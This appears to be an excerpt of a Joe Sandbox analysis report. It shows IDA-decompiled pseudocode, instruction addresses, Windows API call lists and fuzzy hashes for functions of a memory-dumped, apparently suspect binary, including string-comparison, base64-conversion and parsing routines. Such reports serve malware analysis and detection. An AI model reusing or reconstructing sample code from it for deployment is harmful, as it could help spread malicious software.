					_t163 =  *0x5d9b0c; // 0x26f2b8
					 *(_t163 + 8) = 2;
					_push(0x84);
					L7:
					_t164 = E005C5B70();
					_t308 =  &(_t312[1]);
					_t308[0xe] = _t164;
					L8:
					_t235 = 0;
					goto L39;
				}
				_t165 = _t312[6];
				_t296 =  &(_t312[0x1c6]);
				_t312[7] =  *_t165;
				_t312[8] =  *(_t165 + 4);
				E005D4520(_t296, 0x80);
				_t313 =  &(_t312[2]);
				if(lstrcmpiW(_t313[9], _t296) == 0) {
					_t297 = 0;
					_t236 = 0;
					_t313[1] = 1;
				} else {
					E005D4520(_t296, 0x81);
					_t313 =  &(_t313[2]);
					if(lstrcmpiW(_t313[9], _t296) == 0) {
						_t236 = 0;
						_t297 = 1;
						__eflags = 1;
					} else {
						E005D4520(_t296, 0x82);
						_t313 =  &(_t313[2]);
						_t236 = 0 | lstrcmpiW(_t313[9], _t296) == 0x00000000;
						_t297 = 0;
					}
					_t313[1] = 0;
				}
				if(_t313[5] != 3) {
					L22:
					_t172 = E005D2E70( *((intOrPtr*)( &(_t313[0x10]) - 0x20)), 0,  &(_t313[0x10]), 0xffffffff);
					_t312 =  &(_t313[4]);
					__eflags = _t172;
					if(_t172 == 0) {
						_t173 =  *0x5d9b0c; // 0x26f2b8
						 *(_t173 + 8) = 2;
						_push(0x86);
						goto L7;
					}
					_t252 =  *0x5d9a94; // 0x0
					_t312[3] = _t297;
					 *_t312 = _t236;
					_t174 = E005C49B0(_t252, _t312[7]);
					__eflags = _t312[1];
					_t298 = _t174;
					if(_t312[1] == 0) {
						_t237 = 0;
						_t253 = 0;
						L35:
						__eflags = _t298;
						if(_t298 != 0) {
							L61:
							_t238 = _t253;
							_t176 = E005D2E70( *((intOrPtr*)(_t298 + 8)), 0,  &(_t312[0xf]), 0xffffffff);
							_t308 =  &(_t312[4]);
							__eflags = _t176;
							if(__eflags == 0) {
								goto L19;
							}
							_t255 =  *0x5d9a94; // 0x0
							_t179 = E005D20F0(_t255, __eflags, _t298,  &(_t308[0x13]));
							__eflags = _t179;
							if(_t179 == 0) {
								_push(0x87);
								goto L20;
							}
							__eflags = _t308[1];
							if(_t308[1] == 0) {
								__eflags = _t308[3] |  *_t308;
								if((_t308[3] |  *_t308) == 0) {
									__eflags =  *(_t298 + 0x18);
									if( *(_t298 + 0x18) == 0) {
										_push(_t286);
										E005C38E0(_t298, _t302);
										_t308 =  &(_t308[3]);
									} else {
										E005CD950( *((intOrPtr*)(_t298 + 0x48)), _t298, _t302, _t286);
									}
									L99:
									_t235 = 1;
									goto L39;
								}
								_t184 =  *0x5d9b0c; // 0x26f2b8
								_t235 = 1;
								 *((intOrPtr*)(_t184 + 8)) = 1;
								_t185 =  *0x5d9c08; // 0x27a400
								_t185[0x490] = 1;
								__eflags =  *(_t298 + 0x18);
								if( *(_t298 + 0x18) == 0) {
									_t186 = E005D3420(_t298);
									__eflags = _t186;
									if(_t186 == 0) {
										_t187 = 0x89;
										L107:
										_t188 = E005C5B70(_t187);
										_t308 =  &(_t308[1]);
										_t308[0xe] = _t188;
										L108:
										_t258 =  *0x5d9a94; // 0x0
										_push( *_t308);
										L109:
										_push(1);
										_push(_t298);
										E005CD6B0(_t258);
										goto L39;
									}
									_t190 = E005C1F50(_t186, _t298);
									__eflags = _t190;
									if(_t190 != 0) {
										goto L108;
									}
									_t187 = 0x8d;
									goto L107;
								}
								E005D0090(_t185,  *((intOrPtr*)(_t298 + 0x48)), _t298,  *_t308);
								goto L39;
							}
							_t192 = E005D3420(_t298);
							_t262 = _t298;
							__eflags = _t192;
							if(_t192 == 0) {
								_push(0);
								_t290 =  &(_t308[0x195]);
								L80:
								_push(_t290);
								_t193 = E005D1F80(_t262);
								__eflags = _t193;
								if(_t193 != 0) {
									L87:
									_t235 = 0;
									_t195 = E005CC110(_t298,  *((intOrPtr*)( &(_t308[0x94]) - 0x214)),  *((intOrPtr*)( &(_t308[0x94]) - 0x224)),  *((intOrPtr*)( &(_t308[0x94]) - 0x220)),  &(_t308[0x94]),  &(_t308[0x16]), 0, 0, 0);
									__eflags = _t195;
									if(_t195 == 0) {
										_t196 =  *0x5d9b0c; // 0x26f2b8
										 *((intOrPtr*)(_t196 + 8)) = 7;
										_t197 = E005C5B70(0x8b);
										_t308 =  &(_t308[1]);
										_t258 =  *0x5d9a94; // 0x0
										_t308[0xe] = _t197;
										_push(0);
										goto L109;
									}
									_t198 =  *0x5d9c08; // 0x27a400
									_t198[0x490] = 1;
									goto L99;
								}
								_t199 = E005CB7A0(_t290);
								_t308 =  &(_t308[1]);
								_t308[0xe] = _t199;
								_t200 =  *0x5d9b0c; // 0x26f2b8
								 *((intOrPtr*)(_t200 + 8)) = 7;
								_t264 =  *0x5d9a94; // 0x0
								_push(1);
								_push(1);
								L105:
								_push(_t298);
								E005CD6B0(_t264);
								goto L8;
							}
							_t204 = E005C1F50(_t192, _t262);
							__eflags = _t204;
							_t290 =  &(_t308[0x194]);
							if(_t204 == 0) {
								__eflags =  *(_t298 + 0x30);
								if(__eflags == 0) {
									E005D5C10(_t298, __eflags);
									_t262 = _t298;
									_push(0);
									goto L80;
								}
								_t206 = E005C5B70(0x8a);
								_t308 =  &(_t308[1]);
								_t266 =  *0x5d9b0c; // 0x26f2b8
								_t308[0xe] = _t206;
								 *((intOrPtr*)(_t266 + 8)) = 1;
								_t264 =  *0x5d9a94; // 0x0
								_push(0);
								_push(1);
								goto L105;
							}
							__eflags = _t238;
							if(__eflags == 0) {
								E005D5C10(_t298, __eflags);
								_t208 = E005D1F80(_t298, _t290, 0);
								__eflags = _t208;
								if(_t208 == 0) {
									_t209 = E005CB7A0(_t290);
									_t308 =  &(_t308[1]);
									_t269 =  *0x5d9b0c; // 0x26f2b8
									_t308[0xe] = _t209;
									 *((intOrPtr*)(_t269 + 8)) = 7;
									_t264 =  *0x5d9a94; // 0x0
									_push(0);
									_push(1);
									goto L105;
								}
								goto L87;
							}
							_t210 = E005C3180(0x400, 0);
							_t308 =  &(_t308[2]);
							_t308[0xe] = _t210;
							_t211 = _t210 + 0xfffffffe;
							__eflags = _t211;
							_t284 = 0xfffffe00;
							_t270 = _t308[7];
							while(1) {
								_t299 =  *(_t270 + 0x400 + _t284 * 2) & 0x0000ffff;
								__eflags = _t299;
								if(_t299 == 0) {
									break;
								}
								 *(_t211 + 2) = _t299;
								_t211 = _t211 + 2;
								_t284 = _t284 + 1;
								__eflags = _t284;
								if(_t284 != 0) {
									continue;
								}
								L103:
								 *_t214 = 0;
								L38:
								_t215 =  *0x5d9b0c; // 0x26f2b8
								_t235 = 0;
								__eflags = 0;
								 *(_t215 + 8) = 1;
								goto L39;
							}
							 *(_t211 + 2) = 0;
							E005D4520( &(_t308[0x1c7]), 0x8c);
							_t308 =  &(_t308[2]);
							_t285 = _t308[0xe];
							_t271 = 0x200;
							while(1) {
								__eflags =  *_t285;
								if( *_t285 == 0) {
									break;
								}
								_t285 =  &(_t285[0]);
								_t271 = _t271 - 1;
								__eflags = _t271;
								if(_t271 != 0) {
									continue;
								}
								goto L38;
							}
							_t300 = 0;
							__eflags = 0;
							while(1) {
								_t291 =  *(_t308 + 0x718 + _t300 * 2) & 0x0000ffff;
								_t214 = _t285;
								__eflags = _t291;
								if(_t291 == 0) {
									goto L103;
								}
								_t300 = _t300 + 1;
								_t285 =  &(_t214[0]);
								 *_t214 = _t291;
								__eflags = _t271 - _t300;
								if(_t271 != _t300) {
									continue;
								}
								goto L103;
							}
							goto L103;
						}
						L36:
						__eflags =  *_t312 | _t312[3];
						if(( *_t312 | _t312[3]) == 0) {
							_t312[2] = _t253;
							_t272 =  *0x5d9a94; // 0x0
							_t218 =  &(_t312[4]);
							 *_t218 = 0;
							_push(_t218);
							_t219 = E005D3AC0(_t272, _t280, _t312[9], _t237);
							__eflags = _t219;
							if(_t219 == 0) {
								__eflags = _t312[4] - 1;
								if(_t312[4] == 1) {
									_t220 =  *0x5d9b0c; // 0x26f2b8
									 *((intOrPtr*)(_t220 + 8)) = 4;
								}
								_push(0x85);
								goto L7;
							}
							_t253 = _t312[2];
							_t298 = _t219;
							goto L61;
						}
						_t221 = E005C5B70(0x89);
						_t308 =  &(_t312[1]);
						_t308[0xe] = _t221;
						goto L38;
					}
					_t222 = _t312[8];
					_t237 = 0;
					_t273 =  *_t222;
					__eflags = _t273 - 0x740073;
					if(_t273 == 0x740073) {
						__eflags = _t222[1] - 0x720041;
						_t51 = _t222[1] == 0x720041;
						__eflags = _t51;
						_t274 = _t273 & 0xffffff00 | _t51;
					} else {
						__eflags = _t273 - 0x540073;
						_t274 = 0;
						if(_t273 == 0x540073) {
							__eflags = _t222[1] - 0x720061;
							_t237 = 0 | _t222[1] == 0x00720061;
							_t274 = _t237;
						}
					}
					_t253 = _t274 & 0x000000ff;
					__eflags = _t298;
					if(_t298 == 0) {
						goto L35;
					} else {
						__eflags = _t237 | _t253;
						if((_t237 | _t253) != 0) {
							goto L35;
						}
						_t312[2] = _t253;
						do {
							E005CDCC0(_t298,  *((intOrPtr*)(_t298 + 0x44)));
							_t276 =  *0x5d9a94; // 0x0
							E005D6660(_t276, _t312[8], 1);
							_t277 =  *0x5d9a94; // 0x0
							_t227 = E005C49B0(_t277, _t312[7]);
							_t298 = _t227;
							__eflags = _t227;
						} while (_t227 != 0);
						_t253 = _t312[2];
						goto L36;
					}
				} else {
					_t229 =  *(_t313[6] + 8);
					_t313[9] = _t229;
					if(_t229 == 0) {
						L18:
						_t313[0xa] = 0;
						L19:
						_push(0x86);
						L20:
						_t177 = E005C5B70();
						_t308 =  &(_t308[1]);
						_t254 =  *0x5d9b0c; // 0x26f2b8
						_t308[0xe] = _t177;
						_t235 = 0;
						 *(_t254 + 8) = 2;
						goto L39;
					}
					_t280 = 0;
					while(_t229[_t280] != 0) {
						_t280 = _t280 + 1;
						if(_t280 != 0x7fffffff) {
							continue;
						}
						_t313[0xa] = 0;
						goto L18;
					}
					 *( &(_t313[0xc]) - 8) = _t280;
					_t302 =  &(_t313[7]);
					_t230 = E005D08A0(_t229, _t229, _t280,  &(_t313[0xc]),  &(_t313[0xc]));
					__eflags = _t230;
					if(_t230 == 0) {
						_push(0x88);
						goto L20;
					}
					goto L22;
				}
			}

0x005d5eba
0x005d5ebc
0x005d5ebe
0x005d5ec9
0x005d5ece
0x005d5ed1
0x005d5ed6
0x005d5edc
0x005d5ee2
0x005d5ee9
0x005d5ee9
0x005d5eee
0x005d5f9b
0x005d5fa7
0x005d5fac
0x005d5faf
0x005d617d
0x005d617d
0x005d6184
0x005d6195
0x005d6198
0x005d61a1
0x005d61ad
0x005d61b6
0x005d61b6
0x005d61c6
0x005d61cb
0x005d61ce
0x005d61d3
0x005d61d6
0x005d61db
0x005d61de
0x005d61de
0x005d61e4
0x005d61e4
0x005d61e9
0x005d61ec
0x005d61f1
0x005d61f1
0x005d61f4
0x005d61f8
0x005d61fa
0x005d6201
0x005d6204
0x005d6209
0x005d6209
0x005d620c
0x005d6212
0x005d6214
0x005d621a
0x005d621d
0x005d6222
0x005d6225
0x005d6225
0x005d6227
0x005d622c
0x005d6234
0x005d624e
0x005d624e
0x005d6254
0x005d6257
0x005d625c
0x005d625c
0x005d625f
0x005d6265
0x005d6268
0x005d626d
0x005d626d
0x005d6270
0x005d6276
0x005d6279
0x005d627e
0x005d627e
0x005d6281
0x005d6287
0x005d628a
0x005d628f
0x005d629e
0x005d6236
0x005d6236
0x005d6238
0x005d623f
0x005d6244
0x005d6247
0x005d6248
0x00000000
0x005d6238
0x005d6234
0x005d5ef4
0x005d5efb
0x005d5eff
0x005d5f05
0x005d5f07
0x005d5f08
0x005d5f09
0x005d5f0a
0x005d5f0f
0x005d5f12
0x005d5f1b
0x005d5fb8
0x005d5fbd
0x005d5fc4
0x005d5fc9
0x005d5fc9
0x005d5fce
0x005d5fd1
0x005d5fd5
0x005d5fd5
0x00000000
0x005d5fd5
0x005d5f21
0x005d5f25
0x005d5f2e
0x005d5f35
0x005d5f3f
0x005d5f44
0x005d5f54
0x005d5fde
0x005d5fe0
0x005d5fe3
0x005d5f5a
0x005d5f60
0x005d5f65
0x005d5f75
0x005d5fe9
0x005d5fed
0x005d5fed
0x005d5f77
0x005d5f7d
0x005d5f82
0x005d5f94
0x005d5f97
0x005d5f97
0x005d5fee
0x005d5fee
0x005d5ffb
0x005d6078
0x005d6084
0x005d6089
0x005d608c
0x005d608e
0x005d60dc
0x005d60e1
0x005d60e8
0x00000000
0x005d60e8
0x005d6090
0x005d6096
0x005d609a
0x005d60a1
0x005d60a6
0x005d60ab
0x005d60ad
0x005d60f2
0x005d60f4
0x005d6149
0x005d6149
0x005d614b
0x005d62cc
0x005d62cc
0x005d62da
0x005d62df
0x005d62e2
0x005d62e4
0x00000000
0x00000000
0x005d62ea
0x005d62f6
0x005d62fb
0x005d62fd
0x005d6384
0x00000000
0x005d6384
0x005d6303
0x005d6308
0x005d6392
0x005d6395
0x005d645e
0x005d6462
0x005d656b
0x005d656e
0x005d6573
0x005d6468
0x005d646e
0x005d646e
0x005d6576
0x005d6578
0x00000000
0x005d6578
0x005d639b
0x005d63a2
0x005d63a3
0x005d63a6
0x005d63ab
0x005d63b1
0x005d63b5
0x005d6500
0x005d6505
0x005d6507
0x005d65d3
0x005d65d8
0x005d65d9
0x005d65de
0x005d65e1
0x005d65e5
0x005d65e5
0x005d65eb
0x005d65ee
0x005d65ee
0x005d65f0
0x005d65f1
0x00000000
0x005d65f1
0x005d650f
0x005d6514
0x005d6516
0x00000000
0x00000000
0x005d651c
0x00000000
0x005d651c
0x005d63c2
0x00000000
0x005d63c2
0x005d6310
0x005d6315
0x005d6317
0x005d6319
0x005d63e9
0x005d63eb
0x005d63f2
0x005d63f2
0x005d63f3
0x005d63f8
0x005d63fa
0x005d6491
0x005d6491
0x005d64b7
0x005d64bc
0x005d64be
0x005d64d4
0x005d64d9
0x005d64e5
0x005d64ea
0x005d64ed
0x005d64f3
0x005d64f7
0x00000000
0x005d64f7
0x005d64c0
0x005d64c5
0x00000000
0x005d64c5
0x005d6401
0x005d6406
0x005d6409
0x005d640d
0x005d6412
0x005d641b
0x005d6422
0x005d6423
0x005d65c8
0x005d65c8
0x005d65c9
0x00000000
0x005d65c9
0x005d631f
0x005d6324
0x005d6326
0x005d632d
0x005d6429
0x005d642d
0x005d655d
0x005d6562
0x005d6564
0x00000000
0x005d6564
0x005d6438
0x005d643d
0x005d6440
0x005d6448
0x005d644d
0x005d6450
0x005d6456
0x005d6458
0x00000000
0x005d6458
0x005d6333
0x005d6335
0x005d647a
0x005d6484
0x005d6489
0x005d648b
0x005d65a5
0x005d65aa
0x005d65ad
0x005d65b3
0x005d65b7
0x005d65be
0x005d65c4
0x005d65c6
0x00000000
0x005d65c6
0x00000000
0x005d648b
0x005d6342
0x005d6347
0x005d634a
0x005d634e
0x005d634e
0x005d6351
0x005d6356
0x005d635a
0x005d635a
0x005d6362
0x005d6365
0x00000000
0x00000000
0x005d636b
0x005d636f
0x005d6372
0x005d6372
0x005d6373
0x00000000
0x00000000
0x005d659a
0x005d659a
0x005d616f
0x005d616f
0x005d6174
0x005d6174
0x005d6176
0x00000000
0x005d6176
0x005d6526
0x005d6539
0x005d653e
0x005d6541
0x005d6545
0x005d654a
0x005d654a
0x005d654e
0x00000000
0x00000000
0x005d6550
0x005d6553
0x005d6553
0x005d6554
0x00000000
0x00000000
0x00000000
0x005d6556
0x005d657e
0x005d657e
0x005d6580
0x005d6580
0x005d6588
0x005d658a
0x005d658d
0x00000000
0x00000000
0x005d658f
0x005d6590
0x005d6593
0x005d6596
0x005d6598
0x00000000
0x00000000
0x00000000
0x005d6598
0x00000000
0x005d6580
0x005d6151
0x005d6154
0x005d6158
0x005d629f
0x005d62a3
0x005d62a9
0x005d62ad
0x005d62b3
0x005d62b9
0x005d62be
0x005d62c0
0x005d63cc
0x005d63d1
0x005d63d3
0x005d63d8
0x005d63d8
0x005d63df
0x00000000
0x005d63df
0x005d62c6
0x005d62ca
0x00000000
0x005d62ca
0x005d6163
0x005d6168
0x005d616b
0x00000000
0x005d616b
0x005d60af
0x005d60b3
0x005d60b5
0x005d60b7
0x005d60bd
0x005d60f8
0x005d60ff
0x005d60ff
0x005d60ff
0x005d60bf
0x005d60bf
0x005d60c5
0x005d60ca
0x005d60ce
0x005d60d5
0x005d60d8
0x005d60d8
0x005d60ca
0x005d6102
0x005d6105
0x005d6107
0x00000000
0x005d6109
0x005d610b
0x005d610d
0x00000000
0x00000000
0x005d610f
0x005d6113
0x005d6118
0x005d611d
0x005d6129
0x005d612e
0x005d6138
0x005d613d
0x005d613f
0x005d613f
0x005d6143
0x00000000
0x005d6143
0x005d5ffd
0x005d6001
0x005d6006
0x005d600a
0x005d6026
0x005d6026
0x005d602e
0x005d602e
0x005d6033
0x005d6033
0x005d6038
0x005d603b
0x005d6041
0x005d6045
0x005d6047
0x00000000
0x005d6047
0x005d600c
0x005d600e
0x005d6015
0x005d601c
0x00000000
0x00000000
0x005d601e
0x00000000
0x005d601e
0x005d6059
0x005d6065
0x005d606b
0x005d6070
0x005d6072
0x005d637a
0x00000000
0x005d637a
0x00000000
0x005d6072

APIs

lstrcmpiW.KERNEL32(?,?), ref: 005D5F4C
lstrcmpiW.KERNEL32(?,?), ref: 005D5F6D
lstrcmpiW.KERNEL32(?,?), ref: 005D5F8A

Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C30
Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C45
Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C7B
Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C89
Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C97

Part of subcall function 005CC110: lstrlen.KERNEL32(?), ref: 005CC154

Part of subcall function 005C1F50: GetExitCodeThread.KERNEL32(?,?,?,?,005C391B), ref: 005C1F6A

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CloseHandle$lstrcmpi$CodeExitThreadlstrlen
String ID:
API String ID: 1549611325-0
Opcode ID: 3fcc89a6b95feb188254e9d2736054248cea6df2eec221095bee8c59c2ceb780
Instruction ID: 5374555af39ffbacf16caea197ccd24359e4d97589dc861afca51c2f0d9b0fbf
Opcode Fuzzy Hash: 3fcc89a6b95feb188254e9d2736054248cea6df2eec221095bee8c59c2ceb780
Instruction Fuzzy Hash: FD1280B1604302AFE730DF68D889B6A7BE4BB84344F54842FF549873A1EB71D949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 005D7190, Relevance: 3.1, APIs: 2, Instructions: 68encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringW.CRYPT32(0027A490,?,00000001,00000000), ref: 005D71B2

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

CryptBinaryToStringW.CRYPT32(?,?,80000001,00000000), ref: 005D71DE

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: e316239148861573b3f8d3f1ece5deb5e56ffca1cb21951696ae93e08a53a079
Instruction ID: 82a7f8a7bf0039df155e8de435861a56052ffacd172f4bb35e3e304990022aba
Opcode Fuzzy Hash: e316239148861573b3f8d3f1ece5deb5e56ffca1cb21951696ae93e08a53a079
Instruction Fuzzy Hash: D5118B71208214AFD6209B2ADC45A2BBBEDFF9A758F08051AF845D7360E372DD00CB62

Uniqueness

Uniqueness Score: -1.00%

Function 005D08A0, Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 005D08C1

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

CryptStringToBinaryW.CRYPT32(?,00000000,00000007,00000000,?,00000000,00000000), ref: 005D08EC

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 646733e37461d8809ff9ce386da39284e96f247bc0e71765731e55f5bc45e279
Instruction ID: c71eb251d32b49508be4822afb1235ead996d67b90ee2fd7935b98517cf92067
Opcode Fuzzy Hash: 646733e37461d8809ff9ce386da39284e96f247bc0e71765731e55f5bc45e279
Instruction Fuzzy Hash: 3E018071605228BFE2308B1ADC49F5B7FECFF89B94F01442AF44897291D2619D00C6F2

Uniqueness

Uniqueness Score: -1.00%

Function 005D4E70, Relevance: 3.0, APIs: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,005CC60F), ref: 005D4E77
_aulldiv.NTDLL(2AC18000,?,00989680,00000000), ref: 005D4E95

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Time$FileSystem_aulldiv
String ID:
API String ID: 2806457037-0
Opcode ID: b7abda945088012742a9f4bf07ba17b9e6c5324599421d4532bd4bf56ebbed2a
Instruction ID: 7c7cc65733e82cfcf0bb184f99565cb289fd666eae80e5edc2ff925590f65292
Opcode Fuzzy Hash: b7abda945088012742a9f4bf07ba17b9e6c5324599421d4532bd4bf56ebbed2a
Instruction Fuzzy Hash: 15D0A73010111067C120FB28FD49F963718DF41209F04050AF886AA340D615AD14C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 005D3430, Relevance: 2.6, APIs: 2, Instructions: 143
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E005D3430() {
				void* _t36;
				intOrPtr* _t37;
				void* _t38;
				WCHAR** _t48;
				WCHAR* _t50;
				WCHAR** _t51;
				WCHAR** _t55;
				signed int _t57;
				WCHAR** _t58;
				void* _t59;
				WCHAR** _t62;
				WCHAR* _t63;
				intOrPtr _t67;
				WCHAR** _t68;
				signed int _t70;
				void* _t71;
				void* _t73;
				WCHAR** _t75;
				WCHAR** _t76;
				WCHAR** _t78;
				intOrPtr* _t79;
				void* _t80;
				WCHAR*** _t81;
				WCHAR*** _t82;

				_t67 =  *((intOrPtr*)(_t79 + 0x30));
				_t57 = 0;
				 *_t79 = 0;
				 *((intOrPtr*)(_t79 + 8)) = 0;
				if(_t67 != 0) {
					_t36 = E005CC380(_t67, 0, _t79 + 8,  *((intOrPtr*)(_t79 + 0x34)));
					_t80 = _t79 + 0x10;
					if(_t36 != 0) {
						_t37 = _t80 + 0xc;
						 *_t37 = 0x2f;
						_push(6);
						_push(_t80);
						_push(_t37);
						_push( *((intOrPtr*)(_t80 + 0x14)));
						_t38 = E005C9FF0();
						_t81 = _t80 + 0x10;
						_t57 = 0;
						_t73 = _t38;
						_t75 = 0;
						_t81[1] = 0;
						if(_t38 == 6) {
							_t58 = _t81[0x10];
							_t48 = E005C8C50(( *_t81)[4]);
							_t82 =  &(_t81[1]);
							_t76 = _t48;
							_t50 = E005C8C50(( *_t82)[3]);
							_t81 =  &(_t82[1]);
							 *_t58 = _t50;
							if(_t76 == 0) {
								_t57 = 0;
								_t81[1] = 0;
								goto L13;
							} else {
								_t51 =  *_t81;
								_t57 = 0;
								_t81[1] = _t76;
								_t63 = _t51[5];
								if(( *_t63 & 0x0000ffff) != 0xd) {
									L13:
									_t75 = 0;
								} else {
									_t57 = 0;
									if((_t63[1] & 0x0000ffff) != 0xa) {
										goto L13;
									} else {
										_t71 = _t67 + lstrlenW( *_t51) + 2;
										_t59 = 0xfffffff0;
										do {
											_t71 = _t71 + lstrlenW( *( *_t81 + _t59 + 0x14)) + 1;
											_t59 = _t59 + 4;
										} while (_t59 != 0);
										_t78 = _t81[1];
										_t57 = 0;
										if( *((char*)(_t71 +  &(_t78[0]))) != 0xd) {
											goto L13;
										} else {
											_t72 = _t71 + 2;
											_t57 = 0;
											if( *((char*)(_t71 + 2 +  &(_t78[0]))) != 0xa) {
												goto L13;
											} else {
												_t55 = E005C3180(_t78, 0);
												_t81 =  &(_t81[2]);
												if(_t55 == 0) {
													_t57 = 0;
													goto L13;
												} else {
													_t75 = _t55;
													E005CC400(_t55, _t72, _t78);
													_t81 =  &(_t81[3]);
													_t57 = 1;
												}
											}
										}
									}
								}
							}
						}
						_t39 = _t81[2];
						if(_t81[2] != 0) {
							E005C91E0(_t39);
							_t81 =  &(_t81[1]);
						}
						_t40 =  *_t81;
						_t68 = _t81[0xf];
						_t62 = _t81[0xe];
						if( *_t81 != 0) {
							if(_t73 != 0) {
								E005C91E0( *_t40);
								_t81 =  &(_t81[1]);
								if(_t73 != 1) {
									_t70 = 1;
									do {
										E005C91E0(( *_t81)[_t70]);
										_t81 =  &(_t81[1]);
										_t70 = _t70 + 1;
									} while (_t73 != _t70);
								}
								_t40 =  *_t81;
								_t68 = _t81[0xf];
							}
							E005C91E0(_t40);
							_t81 =  &(_t81[1]);
							_t62 = _t81[0xe];
						}
						 *_t62 = _t75;
						 *_t68 = _t81[1];
					}
				}
				return _t57;
			}

0x005d3437
0x005d343b
0x005d343d
0x005d3440
0x005d3446
0x005d3458
0x005d345d
0x005d3462
0x005d3468
0x005d3473
0x005d3479
0x005d347a
0x005d347b
0x005d347c
0x005d3480
0x005d3485
0x005d3488
0x005d348c
0x005d348e
0x005d3493
0x005d349b
0x005d34a4
0x005d34ab
0x005d34b0
0x005d34b3
0x005d34bb
0x005d34c0
0x005d34c5
0x005d34c7
0x005d3555
0x005d3557
0x00000000
0x005d34cd
0x005d34cd
0x005d34d0
0x005d34d2
0x005d34d6
0x005d34df
0x005d355f
0x005d355f
0x005d34e1
0x005d34e5
0x005d34ea
0x00000000
0x005d34ec
0x005d34fa
0x005d34fe
0x005d3503
0x005d350c
0x005d3510
0x005d3510
0x005d3515
0x005d3519
0x005d3520
0x00000000
0x005d3522
0x005d3522
0x005d3525
0x005d352c
0x00000000
0x005d352e
0x005d3531
0x005d3536
0x005d353b
0x005d35d2
0x00000000
0x005d3541
0x005d3543
0x005d3548
0x005d354d
0x005d3552
0x005d3552
0x005d353b
0x005d352c
0x005d3520
0x005d34ea
0x005d34df
0x005d34c7
0x005d3561
0x005d3567
0x005d356a
0x005d356f
0x005d356f
0x005d3572
0x005d3575
0x005d3579
0x005d357f
0x005d3583
0x005d3587
0x005d358c
0x005d3592
0x005d3596
0x005d3597
0x005d359d
0x005d35a2
0x005d35a5
0x005d35a6
0x005d3597
0x005d35aa
0x005d35ad
0x005d35ad
0x005d35b2
0x005d35b7
0x005d35ba
0x005d35ba
0x005d35c2
0x005d35c4
0x005d35c4
0x005d3462
0x005d35cf

APIs

Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,005C8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 005CC396
Part of subcall function 005CC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 005CC3C4

lstrlenW.KERNEL32(00000000), ref: 005D34EE
lstrlenW.KERNEL32(?), ref: 005D350A

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID:
API String ID: 3109718747-0
Opcode ID: 849a1874260f98c1c68379d18086051b13e73c54513ad41a7fb177eeb33674fb
Instruction ID: 37064862e3f63581b1b8e9ed62bfe66ed1e635c6bb8710ac46018c8bb6d7e332
Opcode Fuzzy Hash: 849a1874260f98c1c68379d18086051b13e73c54513ad41a7fb177eeb33674fb
